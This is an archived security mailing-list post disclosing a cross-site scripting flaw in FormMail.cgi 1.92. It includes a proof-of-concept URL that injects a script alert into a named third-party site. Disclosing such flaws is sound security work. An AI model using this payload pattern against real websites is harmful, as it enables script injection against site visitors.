XSS (Cross Site Scripting) on FormMail.CGI

• Previous message: VOID.AT Security: "[VSA0303] Half-Life StatsMe remote (root) hole"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

#############################################################
 
 Topic:        XSS (Cross Site Scripting) on FormMail.CGI  
 Version:      1.92                                        
 Released:     April 21, 2002                              
 Manufacturer: http://www.scriptarchive.com/formmail.html  
 
 By XyborG - xyborgat_private - http://www.rzweb.com.ar/
 
#############################################################
 

Formmai.cgi, it is a utility that serves to send forms by email, among other
uses.
 
The operation is simple.  To see example:


http://www.l-c-u.com.ar/cgi-sys/FormMail.cgi?>alert("<center>Sorry,this\nis\nthe\nsecurity\nsite?\nNo_lo_Creo\n\nCyervo_Lamos...");</script>
 
Duh!

#############################################################
 
 Topic:        XSS (Cross Site Scripting) on FormMail.CGI  
 Version:      1.92                                        
 Released:     April 21, 2002                              
 Manufacturer: http://www.scriptarchive.com/formmail.html  
 
 By XyborG - xyborgat_private - http://www.rzweb.com.ar/
 
#############################################################

-- 
XyBØrG
WebMaster de:
www.RZW.com.ar
Powered By Dattatec.Com

+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
NEU: Mit GMX ins Internet. Rund um die Uhr für 1 ct/ Min. surfen!

• Next message: Martin Schulze: "[SECURITY] [DSA 223-1] New geneweb packages fix information exposure"
• Previous message: VOID.AT Security: "[VSA0303] Half-Life StatsMe remote (root) hole"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jan 20 2003 - 18:54:56 PST